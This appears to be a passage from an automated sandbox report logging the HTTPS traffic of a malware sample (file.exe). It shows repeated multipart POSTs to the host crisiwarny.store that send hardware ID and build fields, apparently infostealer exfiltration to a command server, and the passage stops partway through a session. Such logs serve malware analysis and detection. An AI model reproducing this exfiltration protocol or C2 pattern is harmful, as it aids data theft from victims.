                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 6b 54 78 49 51 37 4d 70 51 34 5a 52 51 4c 57 59 50 31 66 6c 31 6f 31 43 65 42 78 77 64 4c 43 63 49 54 64 46 65 38 70 49 30 6f 76 54 62 68 31 51 6f 44 69 54 68 56 58 52 6f 34 6e 33 31 32 43 58 68 6b 48 39 6e 4b 50 79 6f 68 6c 7a 64 63 66 72 33 5a 6e 53 44 68 41 75 6e 39 47 77 4c 34 4c 48 45 51 48 33 47 48 78 56 35 68 62 4e 67 58 6e 66 63 50 56 77 58 75 66 77 68 62 70 50 43 30 50 63 77 69 32 59 51 36 59 37 44 67 43 57 42 66 41 4a 63 56 5a 6d 6c 4d 78 45 71 64 6b 67 63 79 47 65 34 47 51 53 36 38 6c 4a 30 4d 36 51 4c 64 39 52 73 2b 6a 42 77 42 4f 43 74 68 31 39 31 71 64 55 7a 6b 49 37 6e 62 49 32 4d 31 32 67 4e 51 55 37 6d 35 70 44 7a 70 51 38 53 45 4f 39 72 77 44 48 6d 45 4e 32 6d 36 77 52 64 70 45 64 67 50 72 4f 35 65 56 77 6e 43 46 32 68 7a 6d 4a 43 31 41
                                                                                                          Data Ascii: kTxIQ7MpQ4ZRQLWYP1fl1o1CeBxwdLCcITdFe8pI0ovTbh1QoDiThVXRo4n312CXhkH9nKPyohlzdcfr3ZnSDhAun9GwL4LHEQH3GHxV5hbNgXnfcPVwXufwhbpPC0Pcwi2YQ6Y7DgCWBfAJcVZmlMxEqdkgcyGe4GQS68lJ0M6QLd9Rs+jBwBOCth191qdUzkI7nbI2M12gNQU7m5pDzpQ8SEO9rwDHmEN2m6wRdpEdgPrO5eVwnCF2hzmJC1A
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 59 4f 6a 75 77 4a 43 67 39 65 6c 6b 6a 58 62 39 5a 38 44 45 54 34 4e 64 61 56 77 58 44 4e 69 46 50 6a 4c 53 74 48 4d 6b 36 34 64 55 54 4a 70 77 49 5a 53 77 72 66 59 76 5a 62 6b 56 67 33 41 4f 74 78 79 64 62 46 63 34 4c 66 47 36 39 67 5a 30 67 6c 43 4f 6b 35 61 39 65 6e 41 42 51 50 47 5a 68 2b 73 46 32 59 48 57 35 45 36 33 4c 4a 30 38 4e 77 6a 4e 59 62 36 69 59 6a 54 6a 74 4f 73 6e 5a 4b 78 61 30 42 46 6b 4d 49 33 47 62 78 56 70 39 53 50 51 47 6e 4e 59 2f 53 33 6a 7a 56 6b 43 4c 73 4f 44 42 66 4d 51 69 75 4e 31 65 41 71 77 4a 53 46 30 62 58 64 66 70 51 6d 6c 67 35 41 65 52 30 79 4e 6a 41 63 49 66 5a 47 2b 6b 68 4c 6c 30 2b 52 4c 39 2b 51 4d 79 69 41 78 68 4d 43 35 59 70 73 46 32 4d 48 57 35 45 79 33 7a 43 2b 38 31 77 69 70 41 4d 6f 54 64 6e 53 44 45 49 36
                                                                                                          Data Ascii: YOjuwJCg9elkjXb9Z8DET4NdaVwXDNiFPjLStHMk64dUTJpwIZSwrfYvZbkVg3AOtxydbFc4LfG69gZ0glCOk5a9enABQPGZh+sF2YHW5E63LJ08NwjNYb6iYjTjtOsnZKxa0BFkMI3GbxVp9SPQGnNY/S3jzVkCLsODBfMQiuN1eAqwJSF0bXdfpQmlg5AeR0yNjAcIfZG+khLl0+RL9+QMyiAxhMC5YpsF2MHW5Ey3zC+81wipAMoTdnSDEI6
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 61 43 51 4a 66 42 5a 52 57 35 6c 6d 43 56 6a 73 49 70 32 53 42 7a 49 5a 37 67 5a 42 4c 72 79 67 6f 52 6a 35 48 73 48 42 43 7a 61 6b 48 46 30 34 41 30 6d 33 36 57 70 4a 62 4e 77 48 74 65 4d 37 66 7a 33 75 46 31 78 44 39 62 6d 6b 50 4f 6c 44 78 49 51 37 70 71 78 77 63 58 30 62 4a 4b 65 6b 61 6b 31 46 32 58 4b 64 2f 78 64 72 43 65 34 48 57 46 75 6b 6a 4a 6b 41 38 53 4c 35 39 52 63 6d 71 44 78 39 4b 43 39 4a 31 2b 6c 47 62 55 54 38 49 36 6a 75 42 6c 63 46 6b 7a 59 68 54 33 69 4d 70 51 54 70 65 38 57 59 41 32 65 77 4a 48 67 39 65 6c 6d 62 38 56 5a 64 53 4e 51 66 6d 63 64 33 48 79 6e 57 46 31 52 2f 6b 49 43 46 64 4f 30 65 34 65 6b 33 4a 71 77 59 65 52 51 58 52 4a 37 34 61 6b 30 56 32 58 4b 64 59 32 4d 58 4c 50 4a 4b 65 43 71 38 70 4b 77 39 6c 43 4c 6c 30 52 73
                                                                                                          Data Ascii: aCQJfBZRW5lmCVjsIp2SBzIZ7gZBLrygoRj5HsHBCzakHF04A0m36WpJbNwHteM7fz3uF1xD9bmkPOlDxIQ7pqxwcX0bJKekak1F2XKd/xdrCe4HWFukjJkA8SL59RcmqDx9KC9J1+lGbUT8I6juBlcFkzYhT3iMpQTpe8WYA2ewJHg9elmb8VZdSNQfmcd3HynWF1R/kICFdO0e4ek3JqwYeRQXRJ74ak0V2XKdY2MXLPJKeCq8pKw9lCLl0Rs
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 52 67 4c 65 5a 50 42 65 6b 46 6f 7a 42 2b 74 77 79 4e 62 4a 65 49 54 65 47 75 42 75 61 51 38 36 55 50 45 68 44 75 47 33 44 52 35 43 52 73 6b 70 36 52 71 54 55 58 5a 63 70 33 66 42 30 4d 5a 32 69 39 51 57 36 53 51 69 54 7a 5a 4c 76 6e 31 49 78 4b 4d 4f 47 55 59 48 30 47 4c 36 55 5a 4a 51 4e 51 4c 68 4f 34 47 56 77 57 54 4e 69 46 50 50 4e 53 70 44 4f 67 69 75 4e 31 65 41 71 77 4a 53 46 30 62 64 61 2f 52 64 6c 46 41 31 44 4f 4a 2f 78 64 44 47 64 4a 2f 59 45 2b 67 38 4e 55 38 30 54 62 31 36 54 73 53 71 42 78 52 4d 41 70 59 70 73 46 32 4d 48 57 35 45 79 6e 66 49 2f 4d 46 6e 7a 63 39 64 39 6d 34 67 51 33 30 51 38 58 68 46 79 71 4d 44 45 55 6b 46 33 57 4c 36 57 35 4e 56 4f 78 62 6b 64 4d 44 52 78 6e 4f 4c 31 68 4c 67 4b 43 42 47 50 45 43 32 4f 51 43 41 71 78 5a
                                                                                                          Data Ascii: RgLeZPBekFozB+twyNbJeITeGuBuaQ86UPEhDuG3DR5CRskp6RqTUXZcp3fB0MZ2i9QW6SQiTzZLvn1IxKMOGUYH0GL6UZJQNQLhO4GVwWTNiFPPNSpDOgiuN1eAqwJSF0bda/RdlFA1DOJ/xdDGdJ/YE+g8NU80Tb16TsSqBxRMApYpsF2MHW5EynfI/MFnzc9d9m4gQ30Q8XhFyqMDEUkF3WL6W5NVOxbkdMDRxnOL1hLgKCBGPEC2OQCAqxZ
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 6d 44 6e 56 64 51 54 64 67 75 6e 49 2f 61 56 7a 33 75 57 77 51 58 69 50 69 41 50 41 67 62 78 59 51 36 59 37 44 73 52 51 51 6a 52 63 65 45 58 73 30 73 38 41 2f 64 38 32 4e 71 47 4d 73 33 57 55 37 64 39 61 51 38 35 57 66 45 68 48 70 4c 33 57 30 45 59 56 6f 52 34 76 6b 50 55 53 33 5a 63 74 54 57 50 78 34 59 6b 7a 5a 63 51 2f 54 77 68 54 43 74 4c 39 6b 64 77 35 37 59 44 46 46 67 58 36 46 6e 33 51 4a 6c 62 49 52 57 72 62 73 7a 62 79 48 75 62 6b 46 32 76 49 57 63 58 42 41 6a 35 4f 58 47 4f 37 42 5a 53 46 30 62 6a 5a 50 35 55 6b 30 73 6e 53 63 42 68 77 74 50 52 62 63 32 65 55 2b 6c 75 66 78 39 7a 43 4c 56 6f 44 70 6a 38 58 45 6b 61 56 59 45 33 6f 6b 58 61 52 48 59 53 70 79 4f 64 6d 34 5a 75 7a 59 68 54 71 43 30 31 58 54 74 4c 70 33 6f 4a 2f 70 49 67 46 55 6b 44
                                                                                                          Data Ascii: mDnVdQTdgunI/aVz3uWwQXiPiAPAgbxYQ6Y7DsRQQjRceEXs0s8A/d82NqGMs3WU7d9aQ85WfEhHpL3W0EYVoR4vkPUS3ZctTWPx4YkzZcQ/TwhTCtL9kdw57YDFFgX6Fn3QJlbIRWrbszbyHubkF2vIWcXBAj5OXGO7BZSF0bjZP5Uk0snScBhwtPRbc2eU+lufx9zCLVoDpj8XEkaVYE3okXaRHYSpyOdm4ZuzYhTqC01XTtLp3oJ/pIgFUkD
                                                                                                          2024-10-27 12:03:02 UTC1045INData Raw: 32 43 54 48 73 6a 36 58 7a 4f 77 39 5a 72 67 70 42 64 72 79 68 6e 46 32 38 47 38 58 31 66 67 50 52 65 51 42 52 54 68 54 43 67 43 49 73 54 4c 30 54 78 4f 35 65 48 69 44 79 66 6b 45 75 76 61 53 52 64 4c 30 36 79 62 30 32 48 6b 6a 41 31 51 51 48 58 63 65 42 4e 6d 78 49 59 4d 73 5a 46 38 63 44 46 63 6f 50 58 42 66 35 75 61 51 38 79 43 4f 6c 41 44 6f 6a 73 4d 56 77 50 48 70 59 2f 73 47 2b 58 55 7a 67 44 38 57 71 43 38 73 68 37 6a 4d 59 44 2b 43 46 6f 59 51 74 70 38 54 63 4f 78 75 78 57 51 41 46 47 30 6e 61 77 41 73 51 50 62 56 47 30 4c 4a 2b 48 32 54 4b 55 6b 41 57 76 64 6e 55 42 66 56 72 78 49 51 36 48 72 78 77 41 53 51 58 41 5a 4c 64 6b 71 6e 6f 34 41 2b 5a 74 33 39 6a 4b 58 59 37 42 47 64 45 51 4d 6b 77 7a 52 72 5a 76 58 34 44 69 54 68 30 50 58 75 38 6e 75
                                                                                                          Data Ascii: 2CTHsj6XzOw9ZrgpBdryhnF28G8X1fgPReQBRThTCgCIsTL0TxO5eHiDyfkEuvaSRdL06yb02HkjA1QQHXceBNmxIYMsZF8cDFcoPXBf5uaQ8yCOlADojsMVwPHpY/sG+XUzgD8WqC8sh7jMYD+CFoYQtp8TcOxuxWQAFG0nawAsQPbVG0LJ+H2TKUkAWvdnUBfVrxIQ6HrxwASQXAZLdkqno4A+Zt39jKXY7BGdEQMkwzRrZvX4DiTh0PXu8nu
                                                                                                          2024-10-27 12:03:02 UTC1369INData Raw: 31 65 64 66 0d 0a 7a 68 6e 46 32 34 47 38 57 73 4f 6d 4f 78 4a 48 45 49 48 31 57 6e 7a 53 49 5a 62 4e 52 4c 6b 50 50 48 72 34 33 47 41 31 52 33 6f 45 42 6c 75 4e 31 69 38 64 6b 6d 43 6a 41 6b 45 54 44 6a 6f 55 4f 46 64 68 42 38 51 42 2f 46 34 6a 35 75 47 5a 4d 32 49 55 38 34 6b 4e 30 49 79 54 2f 4e 5a 53 64 61 76 54 6c 77 50 41 70 59 2f 73 48 2b 5a 55 44 4d 4b 34 44 6e 75 33 39 5a 78 67 74 64 52 7a 79 6b 78 54 48 30 47 38 58 55 4f 6d 4f 77 50 47 46 38 4c 32 57 43 38 58 59 35 61 64 6b 71 6e 64 59 2b 4e 68 6e 32 48 77 42 37 67 4b 57 74 4a 4d 30 62 78 5a 67 44 5a 37 42 68 53 46 31 57 59 4a 2b 49 61 7a 42 31 78 42 2f 56 70 79 64 62 51 66 38 72 75 4c 63 49 38 49 46 38 2b 43 6f 42 30 53 74 61 35 44 51 4a 49 4f 4f 68 4b 34 6c 32 45 58 6e 51 31 38 58 6a 50 32 38
                                                                                                          Data Ascii: 1edfzhnF24G8WsOmOxJHEIH1WnzSIZbNRLkPPHr43GA1R3oEBluN1i8dkmCjAkETDjoUOFdhB8QB/F4j5uGZM2IU84kN0IyT/NZSdavTlwPApY/sH+ZUDMK4Dnu39ZxgtdRzykxTH0G8XUOmOwPGF8L2WC8XY5adkqndY+Nhn2HwB7gKWtJM0bxZgDZ7BhSF1WYJ+IazB1xB/VpydbQf8ruLcI8IF8+CoB0Sta5DQJIOOhK4l2EXnQ18XjP28


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449732172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:03 UTC282OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 18168
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:03 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                                          Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                                                                                                          2024-10-27 12:03:04 UTC1016INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=6k644lrp0bgp9cu2q15vsagfj4; expires=Thu, 20 Feb 2025 05:49:43 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2AhvZD%2BkFjJXT%2FBQkRZgaxwNKljj%2F5kiexcR61Fu4cqd3DCzsbCKXKQIgf0KYUrm1b4VjhmJOKM0EQ4ahQMWt3px2p2t8VN9tbgdfQfzB7Wg2LFCJ%2F%2FntT63Xsmc%2BLu1zJh"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a6ccf0de983-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=9&recv=23&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19130&delivery_rate=1782153&cwnd=247&unsent_bytes=0&cid=024d188a63b72509&ts=853&x=0"
                                                                                                          2024-10-27 12:03:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                                          Data Ascii: 11ok 173.254.250.90
                                                                                                          2024-10-27 12:03:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449733172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:05 UTC281OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 8789
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:05 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:05 UTC1015INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:05 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=jqtdl73fj6h57pn72ffu91f7aq; expires=Thu, 20 Feb 2025 05:49:44 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yj1zjGUvfOOghhisfUm1rglG5pE0%2FgBnXoSlRF4o15LXVtZ50YjaJnmo24Qf%2F50f%2FU0q4dsurziVrpl5%2BV%2BF38pPdElzOp%2Bxe9WcOHRomKV2kDkuAWq5NtDzaZDaiZ90X6zb"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a767c6d478c-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9728&delivery_rate=2516072&cwnd=251&unsent_bytes=0&cid=789b1741a69d3500&ts=718&x=0"
                                                                                                          2024-10-27 12:03:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                                          Data Ascii: 11ok 173.254.250.90
                                                                                                          2024-10-27 12:03:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449734172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:06 UTC282OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 20442
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:06 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                                          Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                                                          2024-10-27 12:03:07 UTC1015INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=fog559ld4n6ah6dmhrbagck5mb; expires=Thu, 20 Feb 2025 05:49:46 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mX5z827Arz625uT8hPtWlKdiEUtg9i7CW%2Fj4teB0MDQ9ZmgpX7tf8i5IzXIWNW%2FcFXykB8VTkJ2nvfmA1VA%2FSEIQ0JDl32p3GM4vQpCVUzC5%2BDd0xv1zQbbcPd2pDtwk%2BxpG"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d928a7ff80e315a-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21404&delivery_rate=1800995&cwnd=242&unsent_bytes=0&cid=f91c9a0866bd85a4&ts=669&x=0"
                                                                                                          2024-10-27 12:03:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                                          Data Ascii: 11ok 173.254.250.90
                                                                                                          2024-10-27 12:03:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449735172.67.170.644437472C:\Users\user\Desktop\file.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-27 12:03:08 UTC281OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 1271
                                                                                                          Host: crisiwarny.store
                                                                                                          2024-10-27 12:03:08 UTC1271OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 46 31 34 43 32 30 46 42 42 34 37 35 34 41 42 35 35 37 39 37 30 35 33 45 45 35 46 36 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7EF14C20FBB4754AB55797053EE5F66C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                          2024-10-27 12:03:09 UTC1007INHTTP/1.1 200 OK
                                                                                                          Date: Sun, 27 Oct 2024 12:03:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=bc2mpfss4e7t454t14ovtllte3; expires=Thu, 20 Feb 2025 05:49:48 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          cf-cache-status: DYNAMIC
